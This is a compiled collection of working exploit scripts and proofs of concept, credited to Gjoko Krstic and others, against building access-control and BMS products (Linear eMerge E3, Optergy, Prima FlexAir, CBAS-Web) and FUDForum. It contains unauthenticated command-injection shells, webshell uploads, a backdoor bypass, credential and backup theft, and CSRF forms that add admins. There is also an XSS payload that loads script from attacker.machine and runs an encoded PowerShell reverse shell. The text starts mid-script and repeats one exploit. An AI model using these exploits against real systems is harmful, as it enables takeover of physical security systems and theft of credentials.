import re######

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
  print '''
                                         .....                              
                                    .e$$$$$$$$$$$$$$e.                      
                                  z$$ ^$$$$$$$$$$$$$$$$$.                   
                                .$$$* J$$$$$$$$$$$$$$$$$$$e                 
                               .$"  .$$$$$$$$$$$$$$$$$$$$$$*-               
                              .$  $$$$$$$$$$$$$$$$***$$  .ee"
                 z**$$        $$r ^**$$$$$$$$$*" .e$$$$$$*"
" -\e$$      4$$$$.         .ze$$$""""
               4 z$$$$$      $$$$$$$$$$$$$$$$$$$$"
               $$$$$$$$     .$$$$$$$$$$$**$$$$*"
             z$$"    $$     $$$$P*""     J$*$$c                             
            $$"      $$F   .$$$          $$ ^$$                             
           $$        *$$c.z$$$          $$   $$                             
          $P          $$$$$$$          4$F   4$                             
         dP            *$$$"           $$    '$r                            
        .$                            J$"     $"
        $                             $P     4$                             
        F                            $$      4$                             
                                    4$%      4$                             
                                    $$       4$                             
                                   d$"       $$                             
                                   $P        $$                             
                                  $$         $$                             
                                 4$%         $$                             
                                 $$          $$                             
                                d$           $$                             
                                $F           "3                             
                         r=4e="  ...  ..rf   .  ""%                         
                        $**$*"^""=..^4*=4=^""  ^"""
'''
  print '\n\x20\x20[+] Linear eMerge E3 Remote Root Exploit'
  print '\x20\x20[-] by lqwrm (c) 2019'
  print '\n\x20\x20[*] Usage: '+piton+'<ipaddress:port>\n'
  sys.exit()

ipaddr = sys.argv[1]

creds = raw_input('Do you want me to try and get the web front-end credentials? (y/n) ')
if creds.strip() == 'y':
    frontend = '''grep "Controller" /tmp/SpiderDB/Spider.db |cut -f 5,6 -d ',' |grep ID'''
    requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+frontend+'> test.txt%60')
    showme = requests.get('http://'+ipaddr+'/test.txt')
    print showme.text

while True:
  try:
    cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ')
    execute = requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+cmd+'> test.txt%60')
    #time.sleep(1);
    readreq = requests.get('http://'+ipaddr+'/test.txt')
    print readreq.text
    if cmd.strip() == 'exit':
      print "[+] Erasing read stage file and exiting..."
      requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&ReaderNo=%60rm test.txt%60')
      print "[+] Done. Ba-bye!\n"
      break
    else: continue
  except Exception:
    break

sys.exit()

#!/usr/bin/env python
#
# Linear eMerge E3 Arbitrary File Upload Remote Root Code Execution
# Affected version: <=1.00-06
# CVE: CVE-2019-7257
# Advisory: https://applied-risk.com/resources/ar-2019-005
#
# Discovered by Gjoko 'LiquidWorm' Krstic
#
#####################################################################
#
# lqwrm@metalgear:~/stuff$ python e3upload.py 192.168.1.2
# Starting exploit at 17.01.2019 13:04:17
#
# lighttpd@192.168.1.2:/spider/web/webroot/badging/bg$ id
# uid=1003(lighttpd) gid=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot/badging/bg$ echo davestyle | su -c id
# Password: 
# uid=0(root) gid=0(root) groups=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot/badging/bg$ exit
#
# [+] Deleting webshell.php file...
# [+] Done!
#
#####################################################################

import datetime
import requests
import sys#####
import os######

piton = os.path.basename(sys.argv[0])

badge = "/badging/badge_layout_new_v0.php"
shell = "/badging/bg/webshell.php"

if len(sys.argv) < 2:
  print "\n\x20\x20[*] Usage: "+piton+"<ipaddress:port>\n"
  sys.exit()

ipaddr = sys.argv[1]
vremetodeneska = datetime.datetime.now()

print "Starting exploit at "+vremetodeneska.strftime("%d.%m.%Y %H:%M:%S")
print

while True:
    try:
        target = "http://"+ipaddr+badge

        headers = {"User-Agent": "Brozilla/16.0",
"Accept": "anything",
"Accept-Language": "mk-MK,mk;q=0.7",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "multipart/form-data; boundary=----j",
"Connection": "close"}

        payload = ("------j\r\nContent-Disposition: form-da"
"ta; name=\"layout_name\"\r\n\r\nwebshel"
"l.php\r\n------j\r\nContent-Disposition"
": form-data; name=\"bg\"; filename=\"we"
"bshell.php\"\r\nContent-Type: applicati"
"on/octet-stream\r\n\r\n<?\nif($_GET['cm"
"d']) {\n  system($_GET['cmd']);\n  }\n?"
">\n\r\n------j--\r\n")

        requests.post(target, headers=headers, data=payload)

        cmd = raw_input("lighttpd@"+ipaddr+":/spider/web/webroot/badging/bg$ ")
        execute = requests.get("http://"+ipaddr+shell+"?cmd="+cmd)
        print execute.text
        if cmd.strip() == "exit":
            print "[+] Deleting webshell.php file..."
            requests.get("http://"+ipaddr+shell+"?cmd=rm%20webshell.php")
            print "[+] Done!\n"
            break
        else: continue
    except Exception:
        print "Error!"
        break

sys.exit()

#!/usr/bin/env python
#
# Linear eMerge E3 Unauthenticated Command Injection Remote Root Exploit
# Affected version: <=1.00-06
# via card_scan.php
# CVE: CVE-2019-7256
# Advisory: https://applied-risk.com/resources/ar-2019-005
#
# By Gjoko 'LiquidWorm' Krstic
#
###################################################################
# lqwrm@metalgear:~/stuff$ python emergeroot1.py 192.168.1.2
#
# lighttpd@192.168.1.2:/spider/web/webroot$ id
# uid=1003(lighttpd) gid=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ echo davestyle |su -c id
# Password: 
# uid=0(root) gid=0(root) groups=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ exit
#
# [+] Erasing read stage file and exiting...
# [+] Done. Ba-bye!
#
###################################################################

import requests
import sys,os##

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
  print '\n\x20\x20[*] Usage: '+piton+'<ipaddress:port>\n'
  sys.exit()

ipaddr = sys.argv[1]

print
while True:
  try:
    cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ')
    execute = requests.get('http://'+ipaddr+'/card_scan.php?No=30&ReaderNo=%60'+cmd+'> test.txt%60')
    readreq = requests.get('http://'+ipaddr+'/test.txt')
    print readreq.text
    if cmd.strip() == 'exit':
      print "[+] Erasing read stage file and exiting..."
      requests.get('http://'+ipaddr+'/card_scan.php?No=30&ReaderNo=%60rm test.txt%60')
      print "[+] Done. Ba-bye!\n"
      break
    else: continue
  except Exception:
    break

sys.exit()

#!/usr/bin/env python
#
# Linear eMerge E3 Unauthenticated Command Injection Remote Root Exploit
# Affected version: <=1.00-06
# via card_scan_decoder.php
# CVE: CVE-2019-7256
# Advisory: https://applied-risk.com/resources/ar-2019-005
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
#
# By Gjoko 'LiquidWorm' Krstic
#
#########################################################################
# lqwrm@metalgear:~/stuff$ python emergeroot2.py 192.168.1.2
# Do you want me to try and get the web front-end credentials? (y/n) y
# ID='admin',Password='MakeLoveNotWar!'
#
# lighttpd@192.168.1.2:/spider/web/webroot$ id
# uid=1003(lighttpd) gid=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ cat /etc/version
# Software Version: 1.00.03
# Image: nxgcpub-image
# Built by: jenkins
#
# lighttpd@192.168.1.2:/spider/web/webroot$ echo davestyle |su -c id
# Password: 
# uid=0(root) gid=0(root) groups=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ exit
#
# [+] Erasing read stage file and exiting...
# [+] Done. Ba-bye!
#
#########################################################################

import requests
import time####
import sys#####
import os######
import re######

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
  print '''
                                         .....                              
                                    .e$$$$$$$$$$$$$$e.                      
                                  z$$ ^$$$$$$$$$$$$$$$$$.                   
                                .$$$* J$$$$$$$$$$$$$$$$$$$e                 
                               .$"  .$$$$$$$$$$$$$$$$$$$$$$*-               
                              .$  $$$$$$$$$$$$$$$$***$$  .ee"
                 z**$$        $$r ^**$$$$$$$$$*" .e$$$$$$*"
" -\e$$      4$$$$.         .ze$$$""""
               4 z$$$$$      $$$$$$$$$$$$$$$$$$$$"
               $$$$$$$$     .$$$$$$$$$$$**$$$$*"
             z$$"    $$     $$$$P*""     J$*$$c                             
            $$"      $$F   .$$$          $$ ^$$                             
           $$        *$$c.z$$$          $$   $$                             
          $P          $$$$$$$          4$F   4$                             
         dP            *$$$"           $$    '$r                            
        .$                            J$"     $"
        $                             $P     4$                             
        F                            $$      4$                             
                                    4$%      4$                             
                                    $$       4$                             
                                   d$"       $$                             
                                   $P        $$                             
                                  $$         $$                             
                                 4$%         $$                             
                                 $$          $$                             
                                d$           $$                             
                                $F           "3                             
                         r=4e="  ...  ..rf   .  ""%                         
                        $**$*"^""=..^4*=4=^""  ^"""
'''
  print '\n\x20\x20[+] Linear eMerge E3 Remote Root Exploit'
  print '\x20\x20[-] by lqwrm (c) 2019'
  print '\n\x20\x20[*] Usage: '+piton+'<ipaddress:port>\n'
  sys.exit()

ipaddr = sys.argv[1]

creds = raw_input('Do you want me to try and get the web front-end credentials? (y/n) ')
if creds.strip() == 'y':
    frontend = '''grep "Controller" /tmp/SpiderDB/Spider.db |cut -f 5,6 -d ',' |grep ID'''
    requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+frontend+'> test.txt%60')
    showme = requests.get('http://'+ipaddr+'/test.txt')
    print showme.text

while True:
  try:
    cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ')
    execute = requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+cmd+'> test.txt%60')
    #time.sleep(1);
    readreq = requests.get('http://'+ipaddr+'/test.txt')
    print readreq.text
    if cmd.strip() == 'exit':
      print "[+] Erasing read stage file and exiting..."
      requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&ReaderNo=%60rm test.txt%60')
      print "[+] Done. Ba-bye!\n"
      break
    else: continue
  except Exception:
    break

sys.exit()

Computrols CBAS-Web Unauthenticated Reflected XSS

Affected versions: 19.0.0 and below
CVE: CVE-2019-10846
Advisory: https://applied-risk.com/resources/ar-2019-009
Paper: https://applied-risk.com/resources/i-own-your-building-management-system

Discovered by Gjoko 'LiquidWorm' Krstic

--

POST /cbas/index.php?m=auth&a=verifyid HTTP/1.1

username="><script>confirm(document.cookie)</script>&submit_button=Send+Me+a+New+Password+Via+Email

=======

POST /cbas/index.php?m=auth&a=login HTTP/1.1

username="><marquee>htmlinjection</marquee>&password=&challenge=60753c1b5e449de80e21472b5911594d&response=e16371917371b8b70529737813840c62

=======

GET /cbas/index.php?m=auth&a=login&username="><marquee>my milkshake brings all the boys to the yard.</marquee>&password=damn_right HTTP/1.1

#!/usr/bin/env python
#
# Unauthenticated Remote Root Exploit in Optergy BMS (Console Backdoor)
#
# Affected version <=2.0.3a (Proton and Enterprise)
# Discovered by Gjoko 'LiquidWorm' Krstic
#
# CVE: CVE-2019-7276
# Advisory: https://applied-risk.com/resources/ar-2019-008
#
##############################################################################
#
# lqwrm@metalgear:~/stuff/optergy$ python getroot.py 192.168.232.19
# Challenge received: 1547540929287
# SHA1: 56a6e5bf103591ed45faa2159cae234d04f06d93
# MD5 from SHA1: 873efc9ca9171d575623a99aeda44e31
# Answer: 56a6e5bf103591ed45faa2159cae234d04f06d93873efc9ca9171d575623a99aeda44e31
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
##############################################################################
#
#

import os#######
import sys######
import json#####
import hashlib##
import requests#

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
    print '\n\x20\x20[*] Usage: '+piton+'<ip:port>\n'
    sys.exit()

while True:

    challenge_url = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html?get'

    try:
        req1 = requests.get(challenge_url)
        get_challenge = json.loads(req1.text)
        challenge = get_challenge['response']['message']
        print 'Challenge received: ' + challenge

        hash_object = hashlib.sha1(challenge.encode())
        print 'SHA1: '+(hash_object.hexdigest())
        h1 = (hash_object.hexdigest())
        hash_object = hashlib.md5(h1.encode())
        print 'MD5 from SHA1: '+(hash_object.hexdigest())
        h2 = (hash_object.hexdigest())
        print 'Answer: '+h1+h2

        zeTargets = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html'
        zeCommand = raw_input('# ')
        if zeCommand.strip() == 'exit':
            sys.exit()
        zeHeaders = {'User-Agent'      : 'BB/BMS-251.4ev4h',
'Accept'          : '*/*',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'mk-MK,mk;q=1.7',
'Connection'      : 'keep-alive',
'Connection-Type' : 'application/x-www-form-urlencoded'}
        zePardata = {'command'         : 'sudo '+zeCommand,
'challenge'       : challenge,
'answer'          : h1+h2}

        zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata)
        get_resp = json.loads(zeRequest.text)
        get_answ = get_resp['response']['message']
        print get_answ
    except Exception:
        print '[*] Error!'
        break

Optergy BMS Account Reset and Username Disclosure

Affected version <=2.0.3a (Proton and Enterprise)
Discovered by Gjoko 'LiquidWorm' Krstic

CVE: CVE-2019-7272
Advisory: https://applied-risk.com/resources/ar-2019-008

PoC:

curl -s http://192.168.232.19/Login.html?showReset=true | grep 'option value='
<option value="80">djuro</option>
<option value="99">teppi</option>
<option value="67">view</option>
<option value="3">alerton</option>
<option value="59">stef</option>
<option value="41">humba</option>
<option value="25">drmio</option>
<option value="11">de3</option>
<option value="56">andri</option>
<option value="6">myko</option>
<option value="22">dzonka</option>
<option value="76">kosto</option>
<option value="8">beebee</option>
<option value="1">Administrator</option>

Linear eMerge E3 Privilege Escalation
Affected version: <=1.00-06
CVE: CVE-2019-7258, CVE-2019-7259
Advisory: https://applied-risk.com/resources/ar-2019-005

by Gjoko 'LiquidWorm' Krstic


Escalate:

curl "http://192.168.1.2/?c=webuser&m=update" -X POST –-data "No=3&ID=test&Password=test&Name=test&UserRole=1&Language=en&DefaultPage=sitemap&DefaultFloorNo=1&DefaultFloorState=1&AutoDisconnectTime=24" -H "Cookie: PHPSESSID=d3dda96fc70846b2a7895ffa5ee9aa54; last_floor=1


Disclose:
curl "http://192.168.1.2/?c=webuser&m=select&p=&f=&w=&v=1" -H "Cookie: PHPSESSID=d3dda96fc70846b2a7895ffa5ee9aa54; last_floor=1

// Exploit Title         : FUDForum 3.0.9 - Stored XSS / Remote Code Execution
// Date                  : 10/26/19
// Exploit Author        : liquidsky (JMcPeters)
// Vulnerable Software   : FUDForum 3.0.9
// Vendor Homepage       : https://sourceforge.net/projects/fudforum/
// Version               : 3.0.9
// Software Link         : https://sourceforge.net/projects/fudforum/files/FUDforum_3.0.9.zip/download
// Tested On             : Windows / mysql / apache
// Author Site           : https://github.com/fuzzlove/FUDforum-XSS-RCE
// Demo                  : https://youtu.be/0gsJQ82TXw4 | https://youtu.be/fR8hVK1paks
// CVE                   : CVE-2019-18839, CVE-2019-18873
//
// Greetz : wetw0rk, Fr13ndz, offsec =)
//
// Description: Multiple Stored XSS vulnerabilities have been found in FUDforum 3.0.9 that may result in remote code execution.
//              The areas impacted are the admin panel and the forum.
//
//  XSS via username in Forum:
//  1.  Register an account and log in to the forum.
//  2.  Go to the user control panel. -> Account Settings -> change login
//  3.  Insert javascript payload <script/src="http://attacker.machine/fud.js"></script>
//  4.  When the admin visits the user information the payload will fire, uploading a php shell on the remote system.
//
//  XSS via user-agent in Admin Panel:
//  1.  Register an account and log in to the forum. If you have an IP already associated with a registered user this is not required. This step is so when you run the XSS payload from your attacker machine it gets logged under the user activity.
//  2.  Send the XSS payload below (from an IP associated with an account) / host the script:
//  3.  curl -A '<script src="http://attacker.machine/fud.js"></script>' http://target.machine/fudforum/index.php
//  4.  When the admin visits the user information from the admin controls / User Manager the payload will fire under "Recent sessions", uploading a php shell on the remote system.
//

function patience()
{
  var u=setTimeout("grabShell()",5000);
}

// This function is to call the reverse shell php script (liquidsky.php).
// currently using a powershell payload that will need to be modified.
function grabShell()
{
  var url ="/fudforum/liquidsky.php?cmd=%70%6f%77%65%72%73%68%65%6c%6c%20%2d%45%6e%63%6f%64%65%64%43%6f%6d%6d%61%6e%64%20%4a%41%42%6a%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%67%41%44%30%41%49%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%55%77%42%35%41%48%4d%41%64%41%42%6c%41%47%30%41%4c%67%42%4f%41%47%55%41%64%41%41%75%41%46%4d%41%62%77%42%6a%41%47%73%41%5a%51%42%30%41%48%4d%41%4c%67%42%55%41%45%4d%41%55%41%42%44%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%6f%41%43%63%41%4d%51%41%35%41%44%49%41%4c%67%41%78%41%44%59%41%4f%41%41%75%41%44%49%41%4f%41%41%75%41%44%45%41%4e%51%41%79%41%43%63%41%4c%41%41%30%41%44%51%41%4d%77%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%67%41%44%30%41%49%41%41%6b%41%47%4d%41%62%41%42%70%41%47%55%41%62%67%42%30%41%43%34%41%52%77%42%6c%41%48%51%41%55%77%42%30%41%48%49%41%5a%51%42%68%41%47%30%41%4b%41%41%70%41%44%73%41%57%77%42%69%41%48%6b%41%64%41%42%6c%41%46%73%41%58%51%42%64%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%41%41%50%51%41%67%41%44%41%41%4c%67%41%75%41%44%59%41%4e%51%41%31%41%44%4d%41%4e%51%42%38%41%43%55%41%65%77%41%77%41%48%30%41%4f%77%42%33%41%47%67%41%61%51%42%73%41%47%55%41%4b%41%41%6f%41%43%51%41%61%51%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%55%67%42%6c%41%47%45%41%5a%41%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%49%41%41%77%41%43%77%41%49%41%41%6b%41%47%49%41%65%51%42%30%41%47%55%41%63%77%41%75%41%45%77%41%5a%51%42%75%41%47%63%41%64%41%42%6f%41%43%6b%41%4b%51%41%67%41%43%30%41%62%67%42%6c%41%43%41%41%4d%41%41%70%41%48%73%41%4f%77%41%6b%41%47%51%41%59%51%42%30%41%47%45%41%49%41%41%39%41%43%41%41%4b%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%4c%51%42%55%41%48%6b%41%63%41%42%6c%41%45%34%41%59%51%42%74%41%47%55%41%49%41%42%54%41%48%6b%41%63%77%42%30%41%47%55%41%62%51%41%75%41%46%51%41%5a%51%42%34%41%48%51%41%4c%67%42%42%41%46%4d%41%51%77%42%4a%41%45%6b%41%52%51%42%75%41%47%4d%41%62%77%42%6b%41%47%6b%41%62%67%42%6e%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%54%41%48%51%41%63%67%42%70%41%47%34%41%5a%77%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%4d%41%41%73%41%43%41%41%4a%41%42%70%41%43%6b%41%4f%77%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%44%30%41%49%41%41%6f%41%47%6b%41%5a%51%42%34%41%43%41%41%4a%41%42%6b%41%47%45%41%64%41%42%68%41%43%41%41%4d%67%41%2b%41%43%59%41%4d%51%41%67%41%48%77%41%49%41%42%50%41%48%55%41%64%41%41%74%41%46%4d%41%64%41%42%79%41%47%6b%41%62%67%42%6e%41%43%41%41%4b%51%41%37%41%43%51%41%63%77%42%6c%41%47%34%41%5a%41%42%69%41%47%45%41%59%77%42%72%41%44%49%41%49%41%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%43%73%41%49%41%41%6e%41%46%41%41%55%77%41%67%41%43%63%41%49%41%41%72%41%43%41%41%4b%41%42%77%41%48%63%41%5a%41%41%70%41%43%34%41%55%41%42%68%41%48%51%41%61%41%41%67%41%43%73%41%49%41%41%6e%41%44%34%41%49%41%41%6e%41%44%73%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%49%41%41%39%41%43%41%41%4b%41%42%62%41%48%51%41%5a%51%42%34%41%48%51%41%4c%67%42%6c%41%47%34%41%59%77%42%76%41%47%51%41%61%51%42%75%41%47%63%41%58%51%41%36%41%44%6f%41%51%51%42%54%41%45%4d%41%53%51%42%4a%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%43%41%48%6b%41%64%41%42%6c%41%48%4d%41%4b%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%79%41%43%6b%41%4f%77%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%56%77%42%79%41%47%6b%41%64%41%42%6c%41%43%67%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%41%41%77%41%43%77%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%67%42%4d%41%47%55%41%62%67%42%6e%41%48%51%41%61%41%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%75%41%45%59%41%62%41%42%31%41%48%4d%41%61%41%41%6f%41%43%6b%41%66%51%41%37%41%43%51%41%59%77%42%73%41%47%6b%41%5a%51%42%75%41%48%51%41%4c%67%42%44%41%47%77%41%62%77%42%7a%41%47%55%41%4b%41%41%70%41%41%6f%41";
   xhr = new XMLHttpRequest();
  xhr.open("GET", url, true);
  xhr.send(null);

}

function submitFormWithTokenJS(token) {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", '/fudforum/adm/admbrowse.php', true);

    // Send the proper header information along with the request
    xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary=-----------------------------9703186584101745941654835853");

    var currentdir = "C:/xampp/htdocs/fudforum"; // webroot - forum directory
    var fileName = "liquidsky.php";
    var url      = "/fudforum/adm/admbrowse.php";
    var ctype    = "application/x-php";
    var fileData = "<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; die; }?>";
    var boundary = "-----------------------------9703186584101745941654835853";
    var fileSize = fileData.length;

    var body = "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="cur"\r\n\r\n';
    body += currentdir + "\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="SQ"\r\n\r\n';
    body += token + "\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="fname"; filename="' + fileName + '"\r\n';
    body += "Content-Type: " + ctype + "\r\n\r\n";
    body += fileData + "\r\n\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="tmp_f_val"\r\n\r\n';
    body += "1" + "\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="d_name"\r\n\r\n';
    body += fileName + "\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="file_upload"\r\n\r\n';
    body += "Upload File" + '\r\n';
    body += "--" + boundary + "--";

    xhr.send(body);
}

//Grab SQ token
var req = new XMLHttpRequest();

req.onreadystatechange=function()
{
  if (req.readyState == 4 && req.status == 200) {
    var htmlPage = req.responseXML; /* fetch html */
    var SQ = htmlPage.getElementsByTagName("input")[0]
    submitFormWithTokenJS(SQ.value);
  }
}

req.open("GET", "/fudforum/adm/admuser.php", true);
req.responseType = "document";
req.send();

patience();

#!/usr/bin/env python
# -*- coding: utf8 -*-
#
# Prima FlexAir Access Control 2.3.35 Database Backup Predictable Name Exploit
# Authentication Bypass (Login with MD5 hash)
#
# CVE: CVE-2019-7666, CVE-2019-7667
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
#
# Discovered by Gjoko 'LiquidWorm' Krstic
#
# Older versions: /links/Nova_Config_2019-01-03.bck
# Older versions: /Nova/assets/Nova_Config_2019-01-03.bck
# Newer versions: /links/Nova_Config_2019-01-03_13-53.pdb3
# Fixed versions: 2.4
#
###################################################################################
#
# lqwrm@metalgear:~/stuff/prima$ python exploitDB.py http://192.168.230.17:8080
# [+] Please wait while fetchin the backup config file...
# [+] Found some juice!
# [+] Downloading: http://192.168.230.17:8080/links/Nova_Config_2019-01-07.bck
# [+] Saved as: Nova_Config_2019-01-07.bck-105625.db
# lqwrm@metalgear:~/stuff/prima$ sqlite3 Nova_Config_2019-01-07.bck-105625.db 
# SQLite version 3.22.0 2018-01-22 18:45:57
# Enter ".help" for usage hints.
# sqlite> select usrloginname,usrloginpassword from users where usrid in (1,2);
# superadmin|0dfcfa8cc7fd39d96ffe22dd406b5065
# sysadmin|1af01c4a5a4ec37f451a9feb20a0bbbe
# sqlite> .q
# lqwrm@metalgear:~/stuff/prima$ 
#
###################################################################################
#
# 11.01.2019
#

import os#######
import sys######
import time#####
import requests#

from datetime import timedelta, date
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
    print '[+] Usage: '+piton+' [target]'
    print '[+] Target example 1: http://10.0.0.17:8080'
    print '[+] Target example 2: https://primanova.tld\n'
    sys.exit()

host = sys.argv[1]

def datum(start_date, end_date):
    for n in range(int ((end_date - start_date).days)):
        yield start_date + timedelta(n)

start_date = date(2017, 1, 1)
end_date = date(2019, 12, 30)

print '[+] Please wait while fetchin the backup config file...'

def spinning_cursor():
    while True:
        for cursor in '|/-\\':
            yield cursor

spinner = spinning_cursor()

for mooshoo in datum(start_date, end_date):
    sys.stdout.write(next(spinner))
    sys.stdout.flush()
    time.sleep(0.1)
    sys.stdout.write('\b')
    h = requests.get(host+'/links/Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck', verify=False)

    if (h.status_code) == 200:
        print '[+] Found some juice!'
        print '[+] Downloading: '+host+'/links/Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck'
        timestr = time.strftime('%H%M%S')
        time.sleep(1)
        open('Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck-'+timestr+'.db', 'wb').write(h.content)
        print '[+] Saved as: Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck-'+timestr+'.db'
        sys.exit()

print '[-] No backup for you today. :('

Nortek Linear eMerge E3 Access Control Cross-Site Request Forgery

CVE: CVE-2019-7262
Advisory: https://applied-risk.com/resources/ar-2019-005
Discovered by Gjoko 'LiquidWorm' Krstic

<!-- CSRF Add Super User -->
<html>
<body>
<form action="http://192.168.1.2/?c=webuser&m=insert" method="POST">
<input type="hidden" name="No" value="" />
<input type="hidden" name="ID" value="hax0r" />
<input type="hidden" name="Password" value="hax1n" />
<input type="hidden" name="Name" value="CSRF" />
<input type="hidden" name="UserRole" value="1" />
<input type="hidden" name="Language" value="en" />
<input type="hidden" name="DefaultPage" value="sitemap" />
<input type="hidden" name="DefaultFloorNo" value="1" />
<input type="hidden" name="DefaultFloorState" value="1" />
<input type="hidden" name="AutoDisconnectTime" value="24" />
<input type="submit" value="Add Super User" />
</form>
</body>
</html>

<!-- CSRF Change Admin Password -->
<html>
<body>
<form action="http://192.168.1.2/?c=webuser&m=update" method="POST">
<input type="hidden" name="No" value="1" />
<input type="hidden" name="ID" value="admin" />
<input type="hidden" name="Password" value="backdoor" />
<input type="hidden" name="Name" value="admin" />
<input type="hidden" name="UserRole" value="1" />
<input type="hidden" name="Language" value="en" />
<input type="hidden" name="DefaultPage" value="sitemap" />
<input type="hidden" name="DefaultFloorNo" value="1" />
<input type="hidden" name="DefaultFloorState" value="1" />
<input type="hidden" name="AutoDisconnectTime" value="24" />
<input type="submit" value="Change Admin Password" />
</form>
</body>
</html>

Optergy Proton/Enterprise BMS CSRF Add Admin

Affected version: <=2.0.3a 
Advisory: https://applied-risk.com/resources/ar-2019-008
CVE: CVE-2019-7273
Disovered by Gjoko 'LiquidWorm' Krstic

<!-- CSRF Add Admin Exploit -->
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.232.19/controlPanel/ajax/UserManipulation.html?add" method="POST">
<input type="hidden" name="user.accountEnabled" value="true" />
<input type="hidden" name="user.username" value="testingus" />
<input type="hidden" name="user.password" value="testingus" />
<input type="hidden" name="confirmPassword" value="testingus" />
<input type="hidden" name="user.firstname" value="Tester" />
<input type="hidden" name="user.lastname" value="Testovski" />
<input type="hidden" name="user.companyName" value="TEST Inc." />
<input type="hidden" name="user.address" value="TestStr 17-251" />
<input type="hidden" name="user.emailAddress" value="aa@bb.cc" />
<input type="hidden" name="user.departmentId" value="" />
<input type="hidden" name="user.phoneNumber" value="1112223333" />
<input type="hidden" name="user.mobileNumber" value="1233211234" />
<input type="hidden" name="securityLevel" value="10" />
<input type="hidden" name="user.showBanner" value="true" />
<input type="hidden" name="user.showMenu" value="true" />
<input type="hidden" name="user.showAlarmTab" value="true" />
<input type="hidden" name="user.visibleAlarms" value="0" />
<input type="hidden" name="user.showBookmarks" value="true" />
<input type="hidden" name="user.showNotificationTab" value="true" />
<input type="hidden" name="user.autoDismissFeedback" value="true" />
<input type="hidden" name="user.canChangeBookmarks" value="true" />
<input type="hidden" name="user.canChangePassword" value="true" />
<input type="hidden" name="user.canUpdateProfile" value="true" />
<input type="hidden" name="homepage-text" value="" />
<input type="hidden" name="user.homePageType" value="" />
<input type="hidden" name="user.homePage" value="" />
<input type="hidden" name="background" value="" />
<input type="hidden" name="user.backgroundImage-text" value="" />
<input type="hidden" name="user.backgroundImage" value="" />
<input type="hidden" name="user.backgroundTiled" value="" />
